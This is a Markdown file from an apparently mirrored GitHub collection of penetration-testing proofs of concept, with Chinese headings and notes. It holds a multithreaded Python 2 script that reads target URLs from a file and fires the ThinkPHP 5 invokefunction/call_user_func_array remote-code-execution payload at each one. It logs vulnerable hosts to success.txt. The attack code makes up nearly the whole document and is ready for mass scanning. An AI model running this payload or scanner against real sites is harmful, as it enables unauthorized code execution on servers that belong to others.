admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-08-13 11:28:28 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/thinkphp5命令执行.md
mr-xn 0a116a2b4e upload
2019-07-26 14:42:01 +08:00

59 lines
2.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

### thinkphp5命令执行
### POC检测代码
```python
# -*- coding:UTF-8 -*-
# evn :python2
import requests
import threading
import time
import sys
class check(threading.Thread): #判断是否存在这个漏洞的执行函数
def __init__(self, url, sem):
super(check, self).__init__() #继承threading类的构造方法python3的写法super().__init__()
self.url = url
self.sem = sem
def run(self):
parameters = "s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
try:
responce = requests.get(url = self.url, params = parameters,timeout=3)
body = responce.text
if body.find('PHP Extension') != -1:
with open("success.txt", "a+") as f1:
f1.write("存在tp5远程代码执行漏洞: " + self.url + "\n")
print("[+] " + self.url)
else:
print("[-] " + self.url)
except Exception,err:
print("connect failed")
pass
self.sem.release() #执行完函数释放线程线程数加1
class host(threading.Thread): #遍历文件操作
def __init__(self, sem):
super(host, self).__init__() #继承threading类的构造方法python3的写法super().__init__()
self.sem = sem
def run(self):
with open("url.txt", "r") as f:
for host in f.readlines():
self.sem.acquire() #遍历一个就获得一个线程,直到达到最大
host = host.strip()+"/public/index.php"
host_thread = check(host, self.sem)
host_thread.start() #执行check()的执行函数
if __name__ == '__main__':
sem = threading.Semaphore(10) #最大线程数为10个
thread = host(sem) #传递sem值
thread.start()
```
------
使用方法:在当前页面下创建./url.txt为需要检测的urlsuccess.txt为含有漏洞的url。
Reference in New Issue View Git Blame Copy Permalink